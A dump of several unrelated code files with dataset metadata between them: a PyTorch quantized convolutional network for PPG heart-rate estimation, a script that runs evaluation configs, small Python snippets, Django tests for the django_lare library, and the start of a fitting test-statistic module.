pad=((k_tcb21 - 1) * self.dil[6] + 1) // 2,
wbits=wbits[7],
abits=abits[7],
share_weight=share_weight
)
self.cb2 = ConvBlock(conv,
ch_in=self.ch[7],
ch_out=self.ch[8],
k_size=5,
strd=4,
pad=4,
wbits=wbits[8],
abits=abits[8],
share_weight=share_weight
)
# 1st instance of regressor
self.regr0 = Regressor(
ft_in=self.ch[8] * 4,
ft_out=self.ch[9],
wbits=wbits[9],
abits=abits[9]
)
# 2nd instance of regressor
self.regr1 = Regressor(
ft_in=self.ch[9],
ft_out=self.ch[10],
wbits=wbits[10],
abits=abits[10]
)
self.out_neuron = qm.QuantizedLinear(
inplane=self.ch[10],
outplane=1,
wbits=wbits[11],
abits=abits[11]
)
def forward(self, x):
x = self.cb0(self.tcb01(self.tcb00(x)))
x = self.cb1(self.tcb11(self.tcb10(x)))
x = self.cb2(self.tcb21(self.tcb20(x)))
x = x.flatten(1)
x = self.regr0(x)
x = self.regr1(x)
x = self.out_neuron(x)
return x
class TimePPG(BaseModel):
"""
TEMPONet architecture:
Three repeated instances of TemporalConvBlock and ConvBlock organized as follows:
- TemporalConvBlock
- ConvBlock
Two instances of Regressor followed by a final Linear layer with a single neuron.
"""
def __init__(self, conv, wbits, abits, channels = 'No initialized', share_weight = True, dataset_name='PPG_Dalia', dataset_args={}):
super(TimePPG, self).__init__()
self.conv_func = conv
self.dil = [
2, 2, 1,
4, 4,
8, 8
]
self.rf = [
5, 5, 5,
9, 9,
17, 17
]
if isinstance(channels, list):
self.ch = channels
else:
print('Missed configuration of channels for TimePPG')
exit(0)
# 1st instance of two TempConvBlocks and ConvBlock
k_tcb00 = ceil(self.rf[0]/self.dil[0])
self.tcb00 = TempConvBlock(conv,
ch_in = 4,
ch_out = self.ch[0],
k_size = k_tcb00,
dil = self.dil[0],
pad = ((k_tcb00-1)*self.dil[0]+1)//2,
wbits = wbits,
abits = abits,
share_weight = share_weight,
first_layer = True
)
k_tcb01 = ceil(self.rf[1]/self.dil[1])
self.tcb01 = TempConvBlock(conv,
ch_in = self.ch[0],
ch_out = self.ch[1],
k_size = k_tcb01,
dil = self.dil[1],
pad = ((k_tcb01-1)*self.dil[1]+1)//2,
wbits = wbits,
abits = abits,
share_weight = share_weight
)
k_cb0 = ceil(self.rf[2]/self.dil[2])
self.cb0 = ConvBlock(conv,
ch_in = self.ch[1],
ch_out = self.ch[2],
k_size = k_cb0,
strd = 1,
pad = ((k_cb0-1)*self.dil[2]+1)//2,
dilation = self.dil[2],
wbits = wbits,
abits = abits,
share_weight = share_weight
)
# 2nd instance of two TempConvBlocks and ConvBlock
k_tcb10 = ceil(self.rf[3]/self.dil[3])
self.tcb10 = TempConvBlock(conv,
ch_in = self.ch[2],
ch_out = self.ch[3],
k_size = k_tcb10,
dil = self.dil[3],
pad = ((k_tcb10-1)*self.dil[3]+1)//2,
wbits = wbits,
abits = abits,
share_weight = share_weight
)
k_tcb11 = ceil(self.rf[4]/self.dil[4])
self.tcb11 = TempConvBlock(conv,
ch_in = self.ch[3],
ch_out = self.ch[4],
k_size = k_tcb11,
dil = self.dil[4],
pad = ((k_tcb11-1)*self.dil[4]+1)//2,
wbits = wbits,
abits = abits,
share_weight = share_weight
)
self.cb1 = ConvBlock(conv,
ch_in = self.ch[4],
ch_out = self.ch[5],
k_size = 5,
strd = 2,
pad = 2,
wbits = wbits,
abits = abits,
share_weight = share_weight
)
# 3td instance of TempConvBlock and ConvBlock
k_tcb20 = ceil(self.rf[5]/self.dil[5])
self.tcb20 = TempConvBlock(conv,
ch_in = self.ch[5],
ch_out = self.ch[6],
k_size = k_tcb20,
dil = self.dil[5],
pad = ((k_tcb20-1)*self.dil[5]+1)//2,
wbits = wbits,
abits = abits,
share_weight = share_weight
)
k_tcb21 = ceil(self.rf[6]/self.dil[6])
self.tcb21 = TempConvBlock(conv,
ch_in = self.ch[6],
ch_out = self.ch[7],
k_size = k_tcb21,
dil = self.dil[6],
pad = ((k_tcb21-1)*self.dil[6]+1)//2,
wbits = wbits,
abits = abits,
share_weight = share_weight
)
self.cb2 = ConvBlock(conv,
ch_in = self.ch[7],
ch_out = self.ch[8],
k_size = 5,
strd = 4,
pad = 4,
wbits = wbits,
abits = abits,
share_weight = share_weight
)
# 1st instance of regressor
self.regr0 = Regressor(
ft_in = self.ch[8] * 4,
ft_out = self.ch[9],
wbits = 8,
abits = 8
)
# 2nd instance of regressor
self.regr1 = Regressor(
ft_in = self.ch[9],
ft_out = self.ch[10],
wbits = 8,
abits = 8
)
self.out_neuron = nn.Linear(
in_features = self.ch[10],
out_features = 1
)
def forward(self, x):
x = self.cb0(self.tcb01(self.tcb00(x)))
x = self.cb1(self.tcb11(self.tcb10(x)))
x = self.cb2(self.tcb21(self.tcb20(x)))
x = x.flatten(1)
x = self.regr0(x)
x = self.regr1(x)
x = self.out_neuron(x)
return x
def complexity_loss(self):
size_product = []
loss = 0
for m in self.modules():
if isinstance(m, self.conv_func):
loss += m.complexity_loss()
size_product += [m.size_product]
normalizer = size_product[0].item()
loss /= normalizer
return loss
def fetch_best_arch(self):
sum_bitops, sum_bita, sum_bitw = 0, 0, 0
sum_mixbitops, sum_mixbita, sum_mixbitw = 0, 0, 0
layer_idx = 0
best_arch = None
for m in self.modules():
if isinstance(m, self.conv_func):
layer_arch, bitops, bita, bitw, mixbitops, mixbita, mixbitw = m.fetch_best_arch(layer_idx)
if best_arch is None:
best_arch = layer_arch
else:
for key in layer_arch.keys():
if key not in best_arch:
best_arch[key] = layer_arch[key]
else:
best_arch[key].append(layer_arch[key][0])
sum_bitops += bitops
sum_bita += bita
sum_bitw += bitw
sum_mixbitops += mixbitops
sum_mixbita += mixbita
sum_mixbitw += mixbitw
layer_idx += 1
return best_arch, sum_bitops, sum_bita, sum_bitw, sum_mixbitops, sum_mixbita, sum_mixbitw
class TempConvBlock_multiprec(BaseModel):
"""
Temporal Convolutional Block composed of one temporal convolutional layers.
The block is composed of :
- Conv1d layer
- Chomp1d layer
- ReLU layer
- BatchNorm1d layer
:param ch_in: Number of input channels
:param ch_out: Number of output channels
:param k_size: Kernel size
:param dil: Amount of dilation
:param pad: Amount of padding
"""
def __init__(self, conv, ch_in, ch_out, k_size, dil, pad, wbits, abits, share_weight, first_layer=False):
super(TempConvBlock_multiprec, self).__init__()
if ch_out[0]!=0:
self.tcn0 = conv(
ch_in,
ch_out[0],
kernel_size=k_size,
dilation=dil,
padding=pad,
groups=1,
bias=False,
abits=abits,
wbits=2,
share_weight=share_weight,
first_layer=first_layer
)
if ch_out[1]!=0:
self.tcn1 = conv(
ch_in,
ch_out[1],
kernel_size=k_size,
dilation=dil,
padding=pad,
groups=1,
bias=False,
abits=abits,
wbits=4,
share_weight=share_weight,
first_layer=first_layer
)
if ch_out[2]!=0:
self.tcn2 = conv(
ch_in,
ch_out[2],
kernel_size=k_size,
dilation=dil,
padding=pad,
groups=1,
bias=False,
abits=abits,
wbits=8,
share_weight=share_weight,
first_layer=first_layer
)
self.bn0 = nn.BatchNorm1d(num_features=sum(ch_out))
def forward(self, x):
if hasattr(self, 'tcn0') and hasattr(self, 'tcn1') and hasattr(self, 'tcn2'):
x = torch.cat((self.tcn0(x),self.tcn1(x),self.tcn2(x)),dim=1)
elif hasattr(self, 'tcn0') and hasattr(self, 'tcn1'):
x = torch.cat((self.tcn0(x),self.tcn1(x)),dim=1)
elif hasattr(self, 'tcn0') and hasattr(self, 'tcn2'):
x = torch.cat((self.tcn0(x),self.tcn2(x)),dim=1)
elif hasattr(self, 'tcn1') and hasattr(self, 'tcn2'):
x = torch.cat((self.tcn1(x),self.tcn2(x)),dim=1)
elif hasattr(self, 'tcn0'):
x = self.tcn0(x)
elif hasattr(self, 'tcn1'):
x = self.tcn1(x)
elif hasattr(self, 'tcn2'):
x = self.tcn2(x)
x = self.bn0(x)
return x
class TempConvBlock(BaseModel):
"""
Temporal Convolutional Block composed of one temporal convolutional layers.
The block is composed of :
- Conv1d layer
- Chomp1d layer
- ReLU layer
- BatchNorm1d layer
:param ch_in: Number of input channels
:param ch_out: Number of output channels
:param k_size: Kernel size
:param dil: Amount of dilation
:param pad: Amount of padding
"""
def __init__(self, conv, ch_in, ch_out, k_size, dil, pad, wbits, abits, share_weight, first_layer = False):
super(TempConvBlock, self).__init__()
self.tcn0 = conv(
ch_in,
ch_out,
kernel_size = k_size,
dilation = dil,
padding = pad,
groups = 1,
bias = False,
abits = abits,
wbits = wbits,
share_weight = share_weight,
first_layer = first_layer
)
self.bn0 = nn.BatchNorm1d(num_features = ch_out)
def forward(self, x):
x = self.bn0(self.tcn0(x))
return x
class ConvBlock_multiprec(BaseModel):
"""
Convolutional Block composed of:
- Conv1d layer
- AvgPool1d layer
- ReLU layer
- BatchNorm1d layer
:param ch_in: Number of input channels
:param ch_out: Number of output channels
:param k_size: Kernel size
:param strd: Amount of stride
:param pad: Amount of padding
"""
def __init__(self, conv, ch_in, ch_out, k_size, strd, pad, wbits, abits, share_weight, dilation=1):
super(ConvBlock_multiprec, self).__init__()
if ch_out[0]!=0:
self.conv0 = conv(
ch_in,
ch_out[0],
kernel_size=k_size,
stride=strd,
dilation=dilation,
padding=pad,
groups=1,
bias=False,
abits=abits,
wbits=wbits,
share_weight=share_weight,
first_layer=False
)
if ch_out[1]!=0:
self.conv1 = conv(
ch_in,
ch_out[1],
kernel_size=k_size,
stride=strd,
dilation=dilation,
padding=pad,
groups=1,
bias=False,
abits=abits,
wbits=wbits,
share_weight=share_weight,
first_layer=False
)
if ch_out[2]!=0:
self.conv2 = conv(
ch_in,
ch_out[2],
kernel_size=k_size,
stride=strd,
dilation=dilation,
padding=pad,
groups=1,
bias=False,
abits=abits,
wbits=wbits,
share_weight=share_weight,
first_layer=False
)
self.pool0 = nn.AvgPool1d(
kernel_size=2,
stride=2,
padding=0
)
self.bn0 = nn.BatchNorm1d(sum(ch_out))
def forward(self, x):
if hasattr(self, 'conv0') and hasattr(self, 'conv1') and hasattr(self, 'conv2'):
x = torch.cat((self.conv0(x),self.conv1(x),self.conv2(x)),dim=1)
elif hasattr(self, 'conv0') and hasattr(self, 'conv1'):
x = torch.cat((self.conv0(x),self.conv1(x)),dim=1)
elif hasattr(self, 'conv0') and hasattr(self, 'conv2'):
x = torch.cat((self.conv0(x),self.conv2(x)),dim=1)
elif hasattr(self, 'conv1') and hasattr(self, 'conv2'):
x = torch.cat((self.conv1(x),self.conv2(x)),dim=1)
elif hasattr(self, 'conv0'):
x = self.conv0(x)
elif hasattr(self, 'conv1'):
x = self.conv1(x)
elif hasattr(self, 'conv2'):
x = self.conv2(x)
x = self.bn0(self.pool0(x))
return x
class ConvBlock(BaseModel):
"""
Convolutional Block composed of:
- Conv1d layer
- AvgPool1d layer
- ReLU layer
- BatchNorm1d layer
:param ch_in: Number of input channels
:param ch_out: Number of output channels
:param k_size: Kernel size
:param strd: Amount of stride
:param pad: Amount of padding
"""
def __init__(self, conv, ch_in, ch_out, k_size, strd, pad, wbits, abits, share_weight, dilation=1):
super(ConvBlock, self).__init__()
self.conv0 = conv(
ch_in,
ch_out,
kernel_size = k_size,
stride = strd,
dilation = dilation,
padding = pad,
groups = 1,
bias = False,
abits = abits,
wbits = wbits,
share_weight = share_weight,
first_layer = False
)
self.pool0 = nn.AvgPool1d(
kernel_size = 2,
stride = 2,
padding = 0
)
self.bn0 = nn.BatchNorm1d(ch_out)
def forward(self, x):
x = self.bn0(
self.pool0(
self.conv0(
x
)
)
)
return x
class Regressor(BaseModel):
"""
Regressor block composed of :
- Linear layer
- ReLU layer
- BatchNorm1d layer
:param ft_in: Number of input channels
:param ft_out: Number of output channels
"""
def __init__(self, ft_in, ft_out, wbits, abits):
super(Regressor, self).__init__()
self.ft_in = ft_in
self.ft_out = ft_out
self.fc0 = qm.QuantizedLinear(
inplane = ft_in,
outplane = ft_out,
wbits=wbits,
abits=abits
)
self.bn0 = nn.BatchNorm1d(
num_features = ft_out
)
def forward(self, x):
x = self.bn0(
self.fc0(
x
)
)
return x
class Chomp1d(BaseModel):
"""
Module that perform a chomping operation on the input tensor.
It is used to chomp the amount of zero-padding added on the right of the input tensor, this operation is necessary to compute causal convolutions.
:param chomp_size: amount of padding 0s to be removed
"""
def __init__(self, chomp_size):
super(Chomp1d, self).__init__()
self.chomp_size = chomp_size
def forward(self, x):
return x[:, :, :-self.chomp_size].contiguous()
| 42.108946
| 195
| 0.503124
| 5,814
| 47,541
| 3.952872
| 0.054008
| 0.024889
| 0.028196
| 0.028196
| 0.874467
| 0.866591
| 0.853451
| 0.851275
| 0.843878
| 0.834436
| 0
| 0.076761
| 0.372752
| 47,541
| 1,128
| 196
| 42.146277
| 0.69393
| 0.093288
| 0
| 0.707889
| 0
| 0
| 0.058526
| 0.033902
| 0
| 0
| 0
| 0
| 0
| 1
| 0.056503
| false
| 0.009595
| 0.018124
| 0.026652
| 0.13113
| 0.003198
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
50ae09d9ed928ff2fe69cee13beefcf7d848b329
| 550
|
py
|
Python
|
eval_mosmed_timm-regnetx_002_ShiftScaleRotate.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
eval_mosmed_timm-regnetx_002_ShiftScaleRotate.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
eval_mosmed_timm-regnetx_002_ShiftScaleRotate.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
import os
ls=["python main.py --configs configs/eval_mosmed_unetplusplus_timm-regnetx_002_0_ShiftScaleRotate.yml",
"python main.py --configs configs/eval_mosmed_unetplusplus_timm-regnetx_002_1_ShiftScaleRotate.yml",
"python main.py --configs configs/eval_mosmed_unetplusplus_timm-regnetx_002_2_ShiftScaleRotate.yml",
"python main.py --configs configs/eval_mosmed_unetplusplus_timm-regnetx_002_3_ShiftScaleRotate.yml",
"python main.py --configs configs/eval_mosmed_unetplusplus_timm-regnetx_002_4_ShiftScaleRotate.yml",
]
for l in ls:
os.system(l)
| 50
| 104
| 0.849091
| 80
| 550
| 5.4625
| 0.3
| 0.114416
| 0.1373
| 0.217391
| 0.883295
| 0.883295
| 0.883295
| 0.883295
| 0.883295
| 0.883295
| 0
| 0.038536
| 0.056364
| 550
| 11
| 105
| 50
| 0.803468
| 0
| 0
| 0
| 0
| 0
| 0.880218
| 0.653358
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.111111
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
50e0e5a22159288e161921eb1fd25e46702ad613
| 99
|
py
|
Python
|
2.py
|
chauhanmahavir/Python-Basics
|
c250a9eee203e1188a968ba2c60262442719fa49
|
[
"MIT"
] | 1
|
2020-08-05T05:38:44.000Z
|
2020-08-05T05:38:44.000Z
|
2.py
|
chauhanmahavir/Python-Basics
|
c250a9eee203e1188a968ba2c60262442719fa49
|
[
"MIT"
] | null | null | null |
2.py
|
chauhanmahavir/Python-Basics
|
c250a9eee203e1188a968ba2c60262442719fa49
|
[
"MIT"
] | null | null | null |
print('hii'+str(5))
print(int(8)+5);
print(float(8.5)+5);
print(int(8.5)+5);
#print(int('C'))
| 16.5
| 21
| 0.555556
| 21
| 99
| 2.619048
| 0.380952
| 0.436364
| 0.490909
| 0.363636
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0.101124
| 0.10101
| 99
| 5
| 22
| 19.8
| 0.516854
| 0.151515
| 0
| 0
| 0
| 0
| 0.038462
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
50e3d842c8440f9384677d32fd702dce06cd98e5
| 338
|
py
|
Python
|
src/interpreter/functions/compare.py
|
b-Development-Team/b-star
|
e1a47e118d0f30f7caca5ecc3ac08fadaf2227c6
|
[
"MIT"
] | 1
|
2021-12-28T22:07:10.000Z
|
2021-12-28T22:07:10.000Z
|
src/interpreter/functions/compare.py
|
b-Development-Team/b-star
|
e1a47e118d0f30f7caca5ecc3ac08fadaf2227c6
|
[
"MIT"
] | 6
|
2022-01-07T22:49:19.000Z
|
2022-03-11T05:39:04.000Z
|
src/interpreter/functions/compare.py
|
b-Development-Team/b-star
|
e1a47e118d0f30f7caca5ecc3ac08fadaf2227c6
|
[
"MIT"
] | 4
|
2021-11-26T01:38:32.000Z
|
2022-02-27T20:54:08.000Z
|
def compare(v1, operator, v2):
if operator == ">":
return v1 > v2
elif operator == "<":
return v1 < v2
elif operator == ">=":
return v1 >= v2
elif operator == "<=":
return v1 <= v2
elif operator == "=" or "==":
return v1 == v2
elif operator == "!=":
return v1 != v2
| 24.142857
| 33
| 0.455621
| 36
| 338
| 4.277778
| 0.25
| 0.311688
| 0.38961
| 0.584416
| 0.831169
| 0.831169
| 0.831169
| 0.831169
| 0.623377
| 0.623377
| 0
| 0.066038
| 0.372781
| 338
| 13
| 34
| 26
| 0.660377
| 0
| 0
| 0
| 0
| 0
| 0.032544
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0
| 0
| 0.538462
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
0fdd40f7d99630e4a59354a815a722227f0da17d
| 12,320
|
py
|
Python
|
django_lare/tests.py
|
iekadou/django-lare
|
ac9a0c37b42b30deaacf8b4c12282dd74a806b2f
|
[
"MIT"
] | null | null | null |
django_lare/tests.py
|
iekadou/django-lare
|
ac9a0c37b42b30deaacf8b4c12282dd74a806b2f
|
[
"MIT"
] | 1
|
2016-05-20T08:30:28.000Z
|
2016-05-20T08:30:28.000Z
|
django_lare/tests.py
|
iekadou/django-lare
|
ac9a0c37b42b30deaacf8b4c12282dd74a806b2f
|
[
"MIT"
] | null | null | null |
from __future__ import unicode_literals
from django import VERSION as DJANGO_VERSION
from django.test import TestCase, Client
from django_lare.models import Lare
from django_lare.test_views import *
if DJANGO_VERSION < (1,10):
from django.conf.urls import patterns, url
urlpatterns = patterns('',
url(r'^page1/$', Page1View.as_view(), name='page_1'),
url(r'^page1/content1/$', Page1Content1View.as_view(), name='content_1'),
url(r'^page1/content1/inner_content1/$', Page1Content1InnerContent1View.as_view(), name='inner_content_1'),
url(r'^page1/content1/inner_content2/$', Page1Content1InnerContent2View.as_view(), name='inner_content_2'),
url(r'^page1/content2/$', Page1Content2View.as_view(), name='content_2'),
url(r'^page2/$', Page2View.as_view(), name='page_2'),
url(r'^no-lare-page/$', NoLareView.as_view(), name='no_lare_page'),
)
from django.core.urlresolvers import reverse
elif DJANGO_VERSION <= (2,0):
from django.conf.urls import include, url
urlpatterns = [
url(r'^page1/$', Page1View.as_view(), name='page_1'),
url(r'^page1/content1/$', Page1Content1View.as_view(), name='content_1'),
url(r'^page1/content1/inner_content1/$', Page1Content1InnerContent1View.as_view(), name='inner_content_1'),
url(r'^page1/content1/inner_content2/$', Page1Content1InnerContent2View.as_view(), name='inner_content_2'),
url(r'^page1/content2/$', Page1Content2View.as_view(), name='content_2'),
url(r'^page2/$', Page2View.as_view(), name='page_2'),
url(r'^no-lare-page/$', NoLareView.as_view(), name='no_lare_page'),
]
from django.urls import reverse
else:
from django.urls import include, path
urlpatterns = [
path(r'^page1/$', Page1View.as_view(), name='page_1'),
path(r'^page1/content1/$', Page1Content1View.as_view(), name='content_1'),
path(r'^page1/content1/inner_content1/$', Page1Content1InnerContent1View.as_view(), name='inner_content_1'),
path(r'^page1/content1/inner_content2/$', Page1Content1InnerContent2View.as_view(), name='inner_content_2'),
path(r'^page1/content2/$', Page1Content2View.as_view(), name='content_2'),
path(r'^page2/$', Page2View.as_view(), name='page_2'),
path(r'^no-lare-page/$', NoLareView.as_view(), name='no_lare_page'),
]
from django.urls import reverse
class TestLareRequests(TestCase):
urls = 'django_lare.tests'
page_1_string = 'page_1'
content_1_string = 'content_1'
content_2_string = 'content_2'
# underscore to prevent detecting content_1 as part of inner_content_1
inner_content_1_string = 'inner_con_tent_1'
inner_content_2_string = 'inner_con_tent_2'
page_2_string = 'page_2'
no_lare_page_string = 'no-lare-page'
# testing page level namespace
def test_page_1_no_lare(self):
client = Client()
response = client.get(reverse('page_1'))
self.assertContains(response, self.page_1_string)
self.assertContains(response, '<html>')
self.assertNotContains(response, '<lare-body>')
self.assertContains(response, 'Site1.Page1')
def test_page_1_lare_with_namespace(self):
client = Client()
response = client.get(reverse('page_1'), **{'HTTP_X_LARE': 'Site1.Page2'})
self.assertContains(response, self.page_1_string)
self.assertContains(response, '<lare-body>')
self.assertNotContains(response, '<html>')
self.assertContains(response, 'Site1.Page1')
def test_page_1_lare_different_namespace(self):
client = Client()
response = client.get(reverse('page_1'), **{'HTTP_X_LARE': 'Site2'})
self.assertContains(response, self.page_1_string)
self.assertNotContains(response, '<lare-body>')
self.assertContains(response, '<html>')
self.assertContains(response, 'Site1.Page1')
# testing content level namespace
def test_content_1_no_lare(self):
client = Client()
response = client.get(reverse('content_1'))
self.assertContains(response, self.page_1_string)
self.assertContains(response, self.content_1_string)
self.assertContains(response, '<html>')
self.assertNotContains(response, '<lare-body>')
self.assertContains(response, 'Site1.Page1.Content1')
def test_content_1_lare_current_namespace(self):
client = Client()
response = client.get(reverse('content_1'), **{'HTTP_X_LARE': 'Site1.Page1.Content1'})
self.assertNotContains(response, self.page_1_string)
self.assertNotContains(response, self.content_1_string)
self.assertContains(response, '<lare-body>')
self.assertNotContains(response, '<html>')
self.assertContains(response, 'Site1.Page1.Content1')
def test_content_1_lare_page_namespace(self):
client = Client()
response = client.get(reverse('content_1'), **{'HTTP_X_LARE': 'Site1.Page1'})
self.assertNotContains(response, self.page_1_string)
self.assertContains(response, self.content_1_string)
self.assertContains(response, '<lare-body>')
self.assertNotContains(response, '<html>')
self.assertContains(response, 'Site1.Page1.Content1')
def test_content_1_lare_content_namespace(self):
client = Client()
response = client.get(reverse('content_1'), **{'HTTP_X_LARE': 'Site1.Page1.Content2'})
self.assertNotContains(response, self.page_1_string)
self.assertContains(response, self.content_1_string)
self.assertContains(response, '<lare-body>')
self.assertNotContains(response, '<html>')
self.assertContains(response, 'Site1.Page1.Content1')
def test_content_1_lare_different_page_namespace(self):
client = Client()
response = client.get(reverse('content_1'), **{'HTTP_X_LARE': 'Site1.Page2'})
self.assertContains(response, self.page_1_string)
self.assertContains(response, self.content_1_string)
self.assertContains(response, '<lare-body>')
self.assertNotContains(response, '<html>')
self.assertContains(response, 'Site1.Page1.Content1')
def test_content_1_lare_different_site_namespace(self):
client = Client()
response = client.get(reverse('content_1'), **{'HTTP_X_LARE': 'Site2.Page1'})
self.assertContains(response, self.page_1_string)
self.assertContains(response, self.content_1_string)
self.assertNotContains(response, '<lare-body>')
self.assertContains(response, '<html>')
self.assertContains(response, 'Site1.Page1.Content1')
# testing inner_content level namespace
def test_inner_content_1_no_lare(self):
client = Client()
response = client.get(reverse('inner_content_1'))
self.assertContains(response, self.inner_content_1_string)
self.assertContains(response, self.content_1_string)
self.assertContains(response, self.page_1_string)
self.assertContains(response, '<html>')
self.assertNotContains(response, '<lare-body>')
self.assertContains(response, 'Site1.Page1.Content1.InnerContent1')
def test_inner_content_1_lare_with_namespace(self):
client = Client()
response = client.get(reverse('inner_content_1'), **{'HTTP_X_LARE': 'Site1.Page1.Content1.InnerContent2'})
self.assertContains(response, self.inner_content_1_string)
self.assertNotContains(response, self.content_1_string)
self.assertNotContains(response, self.page_1_string)
self.assertContains(response, '<lare-body>')
self.assertNotContains(response, '<html>')
self.assertContains(response, 'Site1.Page1.Content1.InnerContent1')
def test_inner_content_1_lare_different_content_namespace(self):
client = Client()
response = client.get(reverse('inner_content_1'), **{'HTTP_X_LARE': 'Site1.Page1.Content2'})
self.assertContains(response, self.inner_content_1_string)
self.assertContains(response, self.content_1_string)
self.assertNotContains(response, self.page_1_string)
self.assertContains(response, '<lare-body>')
self.assertNotContains(response, '<html>')
self.assertContains(response, 'Site1.Page1.Content1.InnerContent1')
def test_inner_content_1_lare_different_page_namespace(self):
client = Client()
response = client.get(reverse('inner_content_1'), **{'HTTP_X_LARE': 'Site1.Page2'})
self.assertContains(response, self.inner_content_1_string)
self.assertContains(response, self.content_1_string)
self.assertContains(response, self.page_1_string)
self.assertContains(response, '<lare-body>')
self.assertNotContains(response, '<html>')
self.assertContains(response, 'Site1.Page1.Content1.InnerContent1')
def test_inner_content_1_lare_different_site_namespace(self):
client = Client()
response = client.get(reverse('inner_content_1'), **{'HTTP_X_LARE': 'Site2.Page1.Content1'})
self.assertContains(response, self.inner_content_1_string)
self.assertContains(response, self.content_1_string)
self.assertContains(response, self.page_1_string)
self.assertNotContains(response, '<lare-body>')
self.assertContains(response, '<html>')
self.assertContains(response, 'Site1.Page1.Content1.InnerContent1')
# testing old version
def test_old_version(self):
versions = Lare.supported_version.split('.')
versions[len(versions)-1] = "{0}".format(int(versions[len(versions)-1])-1)
version = '.'.join(versions)
client = Client()
response = client.get(reverse('inner_content_1'), **{'HTTP_X_LARE_VERSION': version, 'HTTP_X_LARE': 'Site1.Page1.Content2'})
self.assertContains(response, self.inner_content_1_string)
self.assertContains(response, self.content_1_string)
self.assertContains(response, self.page_1_string)
self.assertNotContains(response, '<lare-body>')
self.assertContains(response, '<html>')
self.assertContains(response, 'Site1.Page1.Content1.InnerContent1')
def test_future_version(self):
versions = Lare.supported_version.split('.')
versions[len(versions)-1] = "{0}".format(int(versions[len(versions)-1])+1)
version = '.'.join(versions)
client = Client()
response = client.get(reverse('inner_content_1'), **{'HTTP_X_LARE_VERSION': version, 'HTTP_X_LARE': 'Site1.Page1.Content2'})
self.assertContains(response, self.inner_content_1_string)
self.assertContains(response, self.content_1_string)
self.assertNotContains(response, self.page_1_string)
self.assertContains(response, '<lare-body>')
self.assertNotContains(response, '<html>')
self.assertContains(response, 'Site1.Page1.Content1.InnerContent1')
# testing non lare page
def test_non_lare_page(self):
client = Client()
response = client.get(reverse('no_lare_page'))
self.assertContains(response, self.no_lare_page_string)
self.assertContains(response, '<html>')
self.assertNotContains(response, '<lare-body>')
def test_non_lare_page_with_namespace(self):
client = Client()
response = client.get(reverse('no_lare_page'), **{'HTTP_X_LARE': 'Site2.Page1.Content1'})
self.assertContains(response, self.no_lare_page_string)
self.assertContains(response, '<html>')
self.assertNotContains(response, '<lare-body>')
| 52.649573
| 134
| 0.652354
| 1,352
| 12,320
| 5.695266
| 0.067308
| 0.14961
| 0.216104
| 0.116883
| 0.904805
| 0.884805
| 0.884805
| 0.882468
| 0.867792
| 0.843636
| 0
| 0.028241
| 0.221104
| 12,320
| 233
| 135
| 52.875536
| 0.774177
| 0.016964
| 0
| 0.66
| 0
| 0
| 0.167548
| 0.038334
| 0
| 0
| 0
| 0
| 0.45
| 1
| 0.09
| false
| 0
| 0.055
| 0
| 0.19
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ba10c5c24be5a493ed50999cb9c6db9320cf800b
| 24,603
|
py
|
Python
|
echidna/fit/test_statistic.py
|
snoplusuk/echidna
|
9bf38f7233ab172cbf123c1ca97f63df60220f44
|
[
"MIT"
] | 7
|
2015-01-29T13:59:26.000Z
|
2020-01-28T20:06:32.000Z
|
echidna/fit/test_statistic.py
|
snoplusuk/echidna
|
9bf38f7233ab172cbf123c1ca97f63df60220f44
|
[
"MIT"
] | 142
|
2015-01-05T10:57:53.000Z
|
2016-10-11T12:28:02.000Z
|
echidna/fit/test_statistic.py
|
snoplusuk/echidna
|
9bf38f7233ab172cbf123c1ca97f63df60220f44
|
[
"MIT"
] | 10
|
2015-01-08T10:18:32.000Z
|
2016-01-29T10:54:35.000Z
|
""" Module to hold classes for various test statistics that can be used
for fitting.
.. note:: All forms of chi-squared are as defined in:
* S. Baker & R. D. Cousins, Nucl. Inst. and Meth. in Phys. Res. 211,
437-442 (1984)
"""
import numpy
import abc
class TestStatistic(object):
""" Base class for the calculation of a test statistic.
The calculation of any test statistic is based on one spectrum
containing observed events and one containing expected events. It
is assumed that the observed events form the "data" spectrum and
the expected events form the spectrum predicted by the model.
Args:
name (string): Name of test statistic.
per_bin (bool): If True (default) the statistic in each bin is
returned as a :class:`numpy.array`. If False one value for the
